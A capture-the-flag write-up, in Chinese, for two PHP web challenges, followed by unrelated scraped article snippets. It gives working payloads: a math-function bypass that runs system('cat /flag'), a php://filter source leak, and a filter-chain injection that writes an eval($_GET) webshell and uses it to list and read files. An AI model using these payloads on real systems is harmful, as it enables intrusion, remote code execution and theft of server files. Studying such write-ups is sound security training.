2020全国工业互联网安全技术技能大赛Web题WP

news/2024/10/20 15:51:44/

0x00 SimpleCalculator

打开后,发现flag.php可执行数学函数,在网上找到一个原题:https://www.cnblogs.com/20175211lyz/p/11588219.html
可执行shell拿到flag。
payload如下:

http://eci-1cei547jhyas2r4f5r2.cloudeci1.ichunqiu.com/flag.php?search=\$pi=(is_nan\^(6).(4)).(tan\^(1).(5));\$pi=\$\$pi;\$pi{0}(\$pi{1})&0=system&1=cat%20/flag。

在这里插入图片描述

0x01 easyphp

打开后发现是个文件包含的题目,可通过

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

拿到源码:
在这里插入图片描述
他提示需要访问7fa3b767c460b54a2be4d49030b349c7.php,访问后,可以看到7fa3b767c460b54a2be4d49030b349c7.php的源码。
在这里插入图片描述
通过代码审计,可以看到最后一行代码content被exit()函数分隔,这是个绕过死亡exit的题目。而上述waf没有过滤掉zlib.inflate,因此可以构造payload写入shell。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=?content=php://filter/write=string.strip_tags|zlib.inflate|%3f%3e%3c%3fphp+eval(%24_GET%5ba%5d)%3b%3f%3e%3c%3f/resource=shell.php

然后执行shell,发现flag文件。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= ls /

在这里插入图片描述
于是查看/flag,可获得flag。

http://eci-2zegsp1aou4jdyibk8km.cloudeci1.ichunqiu.com/7fa3b767c460b54a2be4d49030b349c7.php?content=shell.php&a= cat /flag

在这里插入图片描述
想学习更多网络安全的知识,可以关注公众号“SCLM安全团队”。
在这里插入图片描述


http://www.ppmy.cn/news/856634.html

相关文章

雷诺卡车Renault C460 发动机失火故障

这是一个简短的案例研究,但这会展现正确的操作步骤,你将发现此任务更简易。在这个案例挑战中,这是一台配备D11发动机的雷诺C460卡车。客户抱怨此车性能不佳且像是发动机失火的异常抖动。没有任何警告灯显示在仪表台上,这很有趣&am…

联想服务器无线网卡被禁用,win10系统联想笔记本禁用无线网络适配器的处理技巧...

有关win10系统联想笔记本禁用无线网络适配器的操作方法想必大家有所耳闻。但是能够对win10系统联想笔记本禁用无线网络适配器进行实际操作的人却不多。其实解决win10系统联想笔记本禁用无线网络适配器的问题也不是难事,小编这里提示两点:1、在联想笔记本…

Node+mysql-注册和登录账号实现(原生)

1.创建数据表 说明:创建id,username,password字段,并设置了类型。 2.导入mysql库 npm i mysql2.18.1 3.创建了db文件夹 说明:创建mysql数据池 // 导入mysql包 const mysqlrequire("mysql") // 创建mysql连接池 const…

机器学习实战 | 深度学习初级项目学习和总结

目录 简介神经网络类型和用法总结1. 卷积神经网络CNN特点结构用处 2. 循环神经网络RNN特点结构用处 3. 长短期记忆网络LSTM特点结构用处 基于Keras的神经网络用法总结1. 创建2. 编译3. 训练4. 保存5. 预测 简介 准备写个系列博客介绍机器学习实战中的部分公开项目。首先从初级…

华为USG系列防火墙配置-网页端登录管理

笔者测试的华为防火墙型号为:HUAWEI USG 6305。 华为USG防火墙默认有一个MGMT端口用来网页端配置管理,端口的IP一般默认是192.168.0.1,端口标识为MGMT,如果无独立MGMT端口,通常0端口是MGMT端口。 电脑设置固定IP 固…

华为转正答辩ppt范文_华为新员工转正答辩

新员工试用期管理是企业人才使用中的一个重要环节。新员工入职后的前3个月非常重要。在这段时间内,通过导师的辅导,新员工应该对自身岗位的工作要求有明确的认知,并适应工作环境,融入公司文化。 华为在新员工转正方面一直有规范化的管理方式,就是新员工转正答辩。新员工转…

【100%通过率】华为OD机试真题 Java 实现【新学校选址】【2022.11 Q4 新题】

所有题目均有五种语言实现。C实现目录、C++ 实现目录、Python实现目录、Java实现目录、JavaScript实现目录

华为交换机创建账号密码方式SSH登录

华为交换机SSH 创建管理账号密码 华为交换机上面创建账号 第一步: sys aaa local-user huawei123 password cipher *** #huawei123:自己设置的用户名 ;#cipher :后面是自设置的密码。 local-user huawei123 privilege leve…